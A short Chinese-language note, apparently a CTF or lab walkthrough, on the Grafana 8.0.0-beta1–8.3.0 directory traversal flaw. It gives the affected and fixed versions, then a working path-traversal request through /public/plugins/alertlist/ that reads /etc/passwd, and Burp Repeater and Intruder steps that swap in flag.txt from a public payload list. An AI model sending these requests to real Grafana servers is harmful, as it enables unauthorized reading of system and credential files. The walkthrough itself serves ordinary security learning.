Grafana 8.0.0-beta1 至 8.3.0 版本(已修复版本除外)存在目录遍历漏洞,允许访问本地文件
Grafana 是一个用于监控和可观测性的开源平台。Grafana 8.0.0-beta1 至 8.3.0 版本(已修复版本除外)存在目录遍历漏洞,允许访问本地文件。易受攻击的 URL 路径为:<grafana_host_url>/public/plugins//,其中 是任意已安装插件的插件 ID。Grafana Cloud 从未受此漏洞影响。建议用户升级到已修复的版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告中包含了关于易受攻击 URL 路径、缓解措施以及披露时间线的更多信息。
使用 Burp Suite
将 GET 请求发送到 Repeater
GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
然后发送到 Intruder GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
使用 Sniper 进行攻击 Payload 从 GitHub 复制 https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
Payload 处理 匹配 [{FILE}] 替换为 {flag.txt}